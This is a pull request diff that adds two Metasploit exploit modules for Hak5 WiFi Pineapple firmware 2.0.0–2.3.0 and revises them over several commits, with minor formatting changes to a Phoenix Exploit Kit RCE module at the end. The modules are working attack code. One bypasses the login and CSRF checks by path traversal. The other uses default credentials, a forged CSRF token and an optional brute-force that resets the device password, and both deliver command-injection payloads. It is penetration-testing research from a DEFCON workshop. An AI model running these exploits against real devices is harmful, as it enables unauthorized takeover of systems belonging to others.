### PR TITLE
WiFi Pineapple v2.0.0-2.3.0 exploits

### DIFF
--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -1,0 +1,106 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+                      'Description'    => "
+                           This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+                           These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
+                           Provided as part of the TospoVirus workshop at DEFCON23.",
+                      'Author'         => ['catatonicprime'],
+                      'License'        => MSF_LICENSE,
+                      'References'     => [ ],
+                      'Platform'       => ['unix'],
+                      'Arch'           => ARCH_CMD,
+                      'Privileged'     => false,
+                      'Payload'        => {
+                        'Space'       => 2048,
+                        'DisableNops' => true,
+                        'Compat'      =>
+                          {
+                            'PayloadType' => 'cmd',
+                            'RequiredCmd' => 'generic python netcat telnet'
+                          }
+                      },
+                      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
+                      'DefaultOptions' => {
+                        'RHOST' => '172.16.42.1',
+                        'RPORT' => 1471
+                      },
+                      'DefaultTarget'  => 0,
+                      'DisclosureDate' => 'Aug 1 2015'))
+
+    register_options(
+      [
+        Opt::RHOST,
+        Opt::RPORT
+      ],
+      self.class
+    )
+
+    deregister_options(
+      'ContextInformationFile',
+      'DOMAIN',
+      'DigestAuthIIS',
+      'EnableContextEncoding',
+      'FingerprintCheck',
+      'HttpClientTimeout',
+      'NTLM::SendLM',
+      'NTLM::SendNTLM',
+      'NTLM::SendSPN',
+      'NTLM::UseLMKey',
+      'NTLM::UseNTLM2_session',
+      'NTLM::UseNTLMv2',
+      'SSL',
+      'SSLVersion',
+      'VERBOSE',
+      'WORKSPACE',
+      'WfsDelay',
+      'Proxies',
+      'VHOST'
+    )
+  end
+
+  def cmd_uri
+    normalize_uri("/includes/css/styles.php/../../../components/system/configuration/functions.php")
+  end
+
+  def cmd_inject(cmd)
+    res = send_request_cgi('method' => 'POST',
+                           'uri' => cmd_uri,
+                           'vars_get' => {
+                             'execute' => "", # Presence triggers command execution
+                           },
+                           'vars_post' => {
+                             'commands' => cmd
+                           })
+    res
+  end
+
+  def check
+    res = cmd_inject("echo")
+    if res && res.code == 200 && res.body =~ /Executing/
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Attempting to bypass login/csrf checks...")
+    unless check
+      fail_with(Failure::NoAccess, "Failed to bypass login/csrf check...")
+    end
+    print_status("#{rhost}:#{rport} - Executing payload...")
+    cmd_inject("#{payload.encoded}")
+  end
+end

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cmd_uri
-    normalize_uri('includes','css','styles.php','../../..', target_uri.path)
+    normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
   end
 
   def cmd_inject(cmd)

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi('method' => 'POST',
                            'uri' => cmd_uri,
                            'vars_get' => {
-                             'execute' => "", # Presence triggers command execution
+                             'execute' => "" # Presence triggers command execution
                            },
                            'vars_post' => {
                              'commands' => cmd

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -12,38 +12,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-                      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
-                      'Description'    => "
-                           This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
-                           These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
-                           Provided as part of the TospoVirus workshop at DEFCON23.",
-                      'Author'         => ['catatonicprime'],
-                      'License'        => MSF_LICENSE,
-                      'References'     => [ ],
-                      'Platform'       => ['unix'],
-                      'Arch'           => ARCH_CMD,
-                      'Privileged'     => false,
-                      'Payload'        => {
-                        'Space'       => 2048,
-                        'DisableNops' => true,
-                        'Compat'      =>
-                          {
-                            'PayloadType' => 'cmd',
-                            'RequiredCmd' => 'generic python netcat telnet'
-                          }
-                      },
-                      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
-                      'DefaultOptions' => {
-                        'RHOST' => '172.16.42.1',
-                        'RPORT' => 1471
-                      },
-                      'DefaultTarget'  => 0,
-                      'DisclosureDate' => 'Aug 1 2015'))
+      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+      'Description'    => %q{
+      This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+      These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
+      Provided as part of the TospoVirus workshop at DEFCON23.
+      },
+      'Author'         => ['catatonicprime'],
+      'License'        => MSF_LICENSE,
+      'References'     => [ ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        => {
+        'Space'        => 2048,
+        'DisableNops'  => true,
+        'Compat'       =>
+          {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic python netcat telnet'
+          }
+      },
+      'Targets'        =>
+        [
+          [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 1 2015'))
 
     register_options(
       [
-        Opt::RHOST,
-        Opt::RPORT
+        Opt::RPORT(1471)
       ],
       self.class
     )
@@ -72,18 +71,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cmd_uri
-    normalize_uri("/includes/css/styles.php/../../../components/system/configuration/functions.php")
+    normalize_uri('includes','css','styles.php','../../..','components','system','configuration','functions.php')
   end
 
   def cmd_inject(cmd)
-    res = send_request_cgi('method' => 'POST',
-                           'uri' => cmd_uri,
-                           'vars_get' => {
-                             'execute' => "" # Presence triggers command execution
-                           },
-                           'vars_post' => {
-                             'commands' => cmd
-                           })
+    res = send_request_cgi(
+      'method'     => 'POST',
+      'uri'        => cmd_uri,
+      'vars_get'   => {
+        'execute'  => "" # Presence triggers command execution
+      },
+      'vars_post'  => {
+        'commands' => cmd
+      })
     res
   end
 
@@ -96,11 +96,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Attempting to bypass login/csrf checks...")
+    print_status('Attempting to bypass login/csrf checks...')
     unless check
-      fail_with(Failure::NoAccess, "Failed to bypass login/csrf check...")
+      fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
     end
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status('Executing payload...')
     cmd_inject("#{payload.encoded}")
   end
 end

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -42,10 +42,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
         Opt::RPORT(1471),
         Opt::RHOST('172.16.42.1')
-      ],
-      self.class
+      ]
     )
 
     deregister_options(
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cmd_uri
-    normalize_uri('includes','css','styles.php','../../..','components','system','configuration','functions.php')
+    normalize_uri('includes','css','styles.php','../../..', target_uri.path)
   end
 
   def cmd_inject(cmd)

--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(1471)
+        Opt::RPORT(1471),
+        Opt::RHOST('172.16.42.1')
       ],
       self.class
     )

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -82,9 +82,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login_uri
-    normalize_uri('includes','api','login.php')
+    normalize_uri('includes', 'api', 'login.php')
   end
-  
+
   def brute_uri
     normalize_uri("/?action=verify_pineapple")
   end

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -46,7 +46,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'The username to use for login', 'root' ]),
         OptString.new('PASSWORD', [ true, 'The password to use for login', 'pineapplesareyummy' ]),
         OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
-        Opt::RPORT(1471)
+        Opt::RPORT(1471),
+        Opt::RHOST('172.16.42.1')
       ],
       self.class
     )

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -1,0 +1,259 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+                      'Description'    => "
+                          This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+                          We use a combination of default credentials with a weakness in the anti-csrf generation to achieve
+                          command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,
+                          you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a
+                          known password if successful and may interrupt the user experience. These devices may typically be identified
+                          by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting
+                          worm.",
+                      'Author'         => ['catatonicprime'],
+                      'License'        => MSF_LICENSE,
+                      'References'     => [ ],
+                      'Platform'       => ['unix'],
+                      'Arch'           => ARCH_CMD,
+                      'Privileged'     => false,
+                      'Payload'        =>
+                        {
+                          'Space'       => 2048,
+                          'DisableNops' => true,
+                          'Compat'      =>
+                          {
+                            'PayloadType' => 'cmd',
+                            'RequiredCmd' => 'generic python netcat telnet'
+                          }
+                        },
+                      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
+                      'DefaultOptions' =>
+                        {
+                          'RHOST' => '172.16.42.1',
+                          'RPORT' => 1471,
+                          'USERNAME' => 'root',
+                          'PASSWORD' => 'pineapplesareyummy',
+                          'PHPSESSID' => 'tospovirus',
+                          'BruteForce' => false,
+                          'BruteForceTries' => 0
+                        },
+                      'DefaultTarget'  => 0,
+                      'DisclosureDate' => 'Aug 1 2015'))
+
+    register_options(
+      [
+        Opt::RHOST,
+        Opt::RPORT
+      ],
+      self.class
+    )
+    register_advanced_options(
+      [
+        OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
+        OptBool.new('BruteForce', [ false, 'When true, attempts to solve LED puzzle after login failure', false ]),
+        OptInt.new('BruteForceTries', [ false, 'Number of tries to solve LED puzzle, 0 -> infinite', 0 ])
+      ],
+      self.class
+    )
+
+    deregister_options(
+      'ContextInformationFile',
+      'DOMAIN',
+      'DigestAuthIIS',
+      'EnableContextEncoding',
+      'FingerprintCheck',
+      'HttpClientTimeout',
+      'NTLM::SendLM',
+      'NTLM::SendNTLM',
+      'NTLM::SendSPN',
+      'NTLM::UseLMKey',
+      'NTLM::UseNTLM2_session',
+      'NTLM::UseNTLMv2',
+      'SSL',
+      'SSLVersion',
+      'VERBOSE',
+      'WORKSPACE',
+      'WfsDelay',
+      'Proxies',
+      'VHOST'
+    )
+  end
+
+  def login_uri
+    normalize_uri("/includes/api/login.php")
+  end
+
+  def cmd_uri
+    normalize_uri("/components/system/configuration/functions.php")
+  end
+
+  def brute_uri
+    normalize_uri("/?action=verify_pineapple")
+  end
+
+  def set_password_uri
+    normalize_uri("/?action=set_password")
+  end
+
+  def phpsessid
+    datastore['PHPSESSID']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def cookie
+    "PHPSESSID=#{phpsessid}"
+  end
+
+  def csrf_token
+    Digest::SHA1.hexdigest datastore['PHPSESSID']
+  end
+
+  def use_brute
+    datastore['BruteForce']
+  end
+
+  def use_brute_tries
+    datastore['BruteForceTries']
+  end
+
+  def login
+    # Create a request to login with the specified credentials.
+    res = send_request_cgi('method' => 'POST',
+                           'uri' => login_uri,
+                           'vars_post' => {
+                             'username' => username,
+                             'password' => password,
+                             'login' => "" # Merely indicates to the pineapple that we'd like to login.
+                           },
+                           'headers' => {
+                             'Cookie' => cookie
+                           })
+
+    return nil unless res
+
+    # Successful logins in preconfig pineapples include a 302 to redirect you to the "please config this device" pages
+    return res if res.code == 302 && (res.body !~ /invalid username/)
+
+    # Already logged in message in preconfig pineapples are 200 and "Invalid CSRF" - which also indicates a success
+    return res if res.code == 200 && (res.body =~ /Invalid CSRF/)
+    nil
+  end
+
+  def cmd_inject(cmd)
+    res = send_request_cgi('method'    => 'POST',
+                           'uri'       => cmd_uri,
+                           'cookie'    => cookie,
+                           'vars_get'  => {
+                             'execute' => "" # Presence triggers command execution
+                           },
+                           'vars_post' => {
+                             '_csrfToken' => csrf_token,
+                             'commands' => cmd
+                           })
+    res
+  end
+
+  def brute_force
+    print_status("Beginning brute forcing...")
+    # Attempt to get a new session cookie with an LED puzzle tied to it.
+    res = send_request_cgi('method' => 'GET',
+                           'uri' => brute_uri)
+
+    # Confirm the response indicates there is a puzzle to be solved.
+    if !res || !(res.code == 200) || res.body !~ /own this pineapple/
+      print_status("Brute forcing not available...")
+      return nil
+    end
+
+    cookies = res.get_cookies
+    counter = 0
+    while use_brute_tries.zero? || counter < use_brute_tries
+      print_status("Try #{counter}...") if (counter % 5).zero?
+      counter += 1
+      res = send_request_cgi('method' => 'POST',
+                             'uri' => brute_uri,
+                             'cookie' => cookies,
+                             'vars_post' => {
+                               'green' => 'on',
+                               'amber' => 'on',
+                               'blue' => 'on',
+                               'red' => 'on',
+                               'verify_pineapple' => 'Continue'
+                             })
+
+      if res && res.code == 200 && res.body =~ /set_password/
+        print_status("Successfully solved puzzle!")
+        return write_password(cookies)
+      end
+    end
+    print_warning("Failed to brute force puzzle in #{counter} tries...")
+    nil
+  end
+
+  def write_password(cookies)
+    print_status("Attempting to set password to: #{password}")
+    res = send_request_cgi('method' => 'POST',
+                           'uri' => set_password_uri,
+                           'cookie' => cookies,
+                           'vars_post' => {
+                             'password' => password,
+                             'password2' => password,
+                             'eula' => 1,
+                             'sw_license' => 1,
+                             'set_password' => 'Set Password'
+                           })
+    if res && res.code == 200 && res.body =~ /success/
+      print_status("Successfully set password!")
+      return res
+    end
+    print_warning("Failed to set password")
+    nil
+  end
+
+  def check
+    loggedin = login
+    unless loggedin
+      brutecheck = send_request_cgi('method' => 'GET',
+                                    'uri' => brute_uri)
+      return Exploit::CheckCode::Safe if !brutecheck || !brutecheck.code == 200 || brutecheck.body !~ /own this pineapple/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    cmd_success = cmd_inject("echo")
+    return Exploit::CheckCode::Vulnerable if cmd_success && cmdSuccess.code == 200 && cmd_success.body =~ /Executing/
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Logging in with credentials...")
+    loggedin = login
+    if !loggedin && use_brute
+      brute_force
+      loggedin = login
+    end
+    unless loggedin
+      fail_with(Failure::NoAccess, "Failed to login PHPSESSID #{phpsessid} with #{username}:#{password}")
+    end
+
+    print_status("#{rhost}:#{rport} - Executing payload...")
+    cmd_inject("#{payload.encoded}")
+  end
+end

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -12,55 +12,46 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-                      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
-                      'Description'    => "
-                          This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
-                          We use a combination of default credentials with a weakness in the anti-csrf generation to achieve
-                          command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,
-                          you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a
-                          known password if successful and may interrupt the user experience. These devices may typically be identified
-                          by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting
-                          worm.",
-                      'Author'         => ['catatonicprime'],
-                      'License'        => MSF_LICENSE,
-                      'References'     => [ ],
-                      'Platform'       => ['unix'],
-                      'Arch'           => ARCH_CMD,
-                      'Privileged'     => false,
-                      'Payload'        =>
-                        {
-                          'Space'       => 2048,
-                          'DisableNops' => true,
-                          'Compat'      =>
-                          {
-                            'PayloadType' => 'cmd',
-                            'RequiredCmd' => 'generic python netcat telnet'
-                          }
-                        },
-                      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
-                      'DefaultOptions' =>
-                        {
-                          'RHOST' => '172.16.42.1',
-                          'RPORT' => 1471,
-                          'USERNAME' => 'root',
-                          'PASSWORD' => 'pineapplesareyummy',
-                          'PHPSESSID' => 'tospovirus',
-                          'BruteForce' => false,
-                          'BruteForceTries' => 0
-                        },
-                      'DefaultTarget'  => 0,
-                      'DisclosureDate' => 'Aug 1 2015'))
+      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+      'Description'    => %q{
+      This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+      We use a combination of default credentials with a weakness in the anti-csrf generation to achieve
+      command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,
+      you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a
+      known password if successful and may interrupt the user experience. These devices may typically be identified
+      by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting
+      worm.
+      },
+      'Author'         => ['catatonicprime'],
+      'License'        => MSF_LICENSE,
+      'References'     => [ ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        => {
+        'Space'        => 2048,
+        'DisableNops'  => true,
+        'Compat'       => {
+          'PayloadType'  => 'cmd',
+          'RequiredCmd'  => 'generic python netcat telnet'
+        }
+      },
+      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 1 2015'
+    ))
 
     register_options(
       [
-        Opt::RHOST,
-        Opt::RPORT
+        OptString.new('USERNAME', [ true, 'The username to use for login', 'root' ]),
+        OptString.new('PASSWORD', [ true, 'The password to use for login', 'pineapplesareyummy' ]),
+        OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
+        Opt::RPORT(1471)
       ],
       self.class
     )
     register_advanced_options(
       [
-        OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
         OptBool.new('BruteForce', [ false, 'When true, attempts to solve LED puzzle after login failure', false ]),
         OptInt.new('BruteForceTries', [ false, 'Number of tries to solve LED puzzle, 0 -> infinite', 0 ])
       ],
@@ -91,11 +82,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login_uri
-    normalize_uri("/includes/api/login.php")
+    normalize_uri('includes','api','login.php')
   end
 
   def cmd_uri
-    normalize_uri("/components/system/configuration/functions.php")
+    normalize_uri('components','system','configuration','functions.php')
   end
 
   def brute_uri
@@ -136,16 +127,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def login
     # Create a request to login with the specified credentials.
-    res = send_request_cgi('method' => 'POST',
-                           'uri' => login_uri,
-                           'vars_post' => {
-                             'username' => username,
-                             'password' => password,
-                             'login' => "" # Merely indicates to the pineapple that we'd like to login.
-                           },
-                           'headers' => {
-                             'Cookie' => cookie
-                           })
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => login_uri,
+      'vars_post' => {
+        'username'   => username,
+        'password'   => password,
+        'login'      => "" # Merely indicates to the pineapple that we'd like to login.
+      },
+      'headers'   => {
+        'Cookie'     => cookie
+      }
+    )
 
     return nil unless res
 
@@ -154,32 +147,38 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Already logged in message in preconfig pineapples are 200 and "Invalid CSRF" - which also indicates a success
     return res if res.code == 200 && (res.body =~ /Invalid CSRF/)
+
     nil
   end
 
   def cmd_inject(cmd)
-    res = send_request_cgi('method'    => 'POST',
-                           'uri'       => cmd_uri,
-                           'cookie'    => cookie,
-                           'vars_get'  => {
-                             'execute' => "" # Presence triggers command execution
-                           },
-                           'vars_post' => {
-                             '_csrfToken' => csrf_token,
-                             'commands' => cmd
-                           })
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => cmd_uri,
+      'cookie'    => cookie,
+      'vars_get'  => {
+        'execute' => "" # Presence triggers command execution
+      },
+      'vars_post' => {
+        '_csrfToken' => csrf_token,
+        'commands'   => cmd
+      }
+    )
+
     res
   end
 
   def brute_force
-    print_status("Beginning brute forcing...")
+    print_status('Beginning brute forcing...')
     # Attempt to get a new session cookie with an LED puzzle tied to it.
-    res = send_request_cgi('method' => 'GET',
-                           'uri' => brute_uri)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => brute_uri
+    )
 
     # Confirm the response indicates there is a puzzle to be solved.
     if !res || !(res.code == 200) || res.body !~ /own this pineapple/
-      print_status("Brute forcing not available...")
+      print_status('Brute forcing not available...')
       return nil
     end
 
@@ -188,19 +187,21 @@ class MetasploitModule < Msf::Exploit::Remote
     while use_brute_tries.zero? || counter < use_brute_tries
       print_status("Try #{counter}...") if (counter % 5).zero?
       counter += 1
-      res = send_request_cgi('method' => 'POST',
-                             'uri' => brute_uri,
-                             'cookie' => cookies,
-                             'vars_post' => {
-                               'green' => 'on',
-                               'amber' => 'on',
-                               'blue' => 'on',
-                               'red' => 'on',
-                               'verify_pineapple' => 'Continue'
-                             })
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => brute_uri,
+        'cookie'    => cookies,
+        'vars_post' => {
+          'green'            => 'on',
+          'amber'            => 'on',
+          'blue'             => 'on',
+          'red'              => 'on',
+          'verify_pineapple' => 'Continue'
+        }
+      )
 
       if res && res.code == 200 && res.body =~ /set_password/
-        print_status("Successfully solved puzzle!")
+        print_status('Successfully solved puzzle!')
         return write_password(cookies)
       end
     end
@@ -210,40 +211,46 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def write_password(cookies)
     print_status("Attempting to set password to: #{password}")
-    res = send_request_cgi('method' => 'POST',
-                           'uri' => set_password_uri,
-                           'cookie' => cookies,
-                           'vars_post' => {
-                             'password' => password,
-                             'password2' => password,
-                             'eula' => 1,
-                             'sw_license' => 1,
-                             'set_password' => 'Set Password'
-                           })
+    res = send_request_cgi(
+      'method'     => 'POST',
+      'uri'        => set_password_uri,
+      'cookie'     => cookies,
+      'vars_post'  => {
+        'password'     => password,
+        'password2'    => password,
+        'eula'         => 1,
+        'sw_license'   => 1,
+        'set_password' => 'Set Password'
+      }
+    )
     if res && res.code == 200 && res.body =~ /success/
-      print_status("Successfully set password!")
+      print_status('Successfully set password!')
       return res
     end
-    print_warning("Failed to set password")
+    print_warning('Failed to set password')
+
     nil
   end
 
   def check
     loggedin = login
     unless loggedin
-      brutecheck = send_request_cgi('method' => 'GET',
-                                    'uri' => brute_uri)
+      brutecheck = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => brute_uri
+      )
       return Exploit::CheckCode::Safe if !brutecheck || !brutecheck.code == 200 || brutecheck.body !~ /own this pineapple/
       return Exploit::CheckCode::Vulnerable
     end
 
     cmd_success = cmd_inject("echo")
     return Exploit::CheckCode::Vulnerable if cmd_success && cmdSuccess.code == 200 && cmd_success.body =~ /Executing/
+
     Exploit::CheckCode::Safe
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Logging in with credentials...")
+    print_status('Logging in with credentials...')
     loggedin = login
     if !loggedin && use_brute
       brute_force
@@ -253,7 +260,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "Failed to login PHPSESSID #{phpsessid} with #{username}:#{password}")
     end
 
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status('Executing payload...')
     cmd_inject("#{payload.encoded}")
   end
 end

--- a/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb
@@ -46,17 +46,16 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'The username to use for login', 'root' ]),
         OptString.new('PASSWORD', [ true, 'The password to use for login', 'pineapplesareyummy' ]),
         OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
+        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
         Opt::RPORT(1471),
         Opt::RHOST('172.16.42.1')
-      ],
-      self.class
+      ]
     )
     register_advanced_options(
       [
         OptBool.new('BruteForce', [ false, 'When true, attempts to solve LED puzzle after login failure', false ]),
         OptInt.new('BruteForceTries', [ false, 'Number of tries to solve LED puzzle, 0 -> infinite', 0 ])
-      ],
-      self.class
+      ]
     )
 
     deregister_options(
@@ -85,11 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def login_uri
     normalize_uri('includes','api','login.php')
   end
-
-  def cmd_uri
-    normalize_uri('components','system','configuration','functions.php')
-  end
-
+  
   def brute_uri
     normalize_uri("/?action=verify_pineapple")
   end
@@ -155,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def cmd_inject(cmd)
     res = send_request_cgi(
       'method'    => 'POST',
-      'uri'       => cmd_uri,
+      'uri'       => target_uri.path,
       'cookie'    => cookie,
       'vars_get'  => {
         'execute' => "" # Presence triggers command execution

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'CrashBandicot', #initial discovery by @DosPerl
-          'Jay Turla <@shipcod3>', #msf module
+          'Jay Turla <@shipcod3>' #msf module
         ],
       'References'     =>
         [

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -14,22 +14,22 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
       'Description'    => %q{
-        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
         Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
-        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
-        then silently installs malware.
+        presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
+        silently installing malware if found.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'CrashBandicot @DosPerl', #initial discovery
+          'CrashBandicot', #initial discovery by @DosPerl
           'Jay Turla <@shipcod3>', #msf module
         ],
       'References'     =>
         [
           [ 'EDB', '40047' ],
           [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
-          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
         ],
       'Privileged'     => false,
       'Payload'        =>
@@ -45,25 +45,25 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Targets'        =>
         [
-          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
-          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+          [ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+          [ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
         ],
       'DisclosureDate' => 'Jul 01 2016',
       'DefaultTarget'  => 0))
 
     register_options(
       [
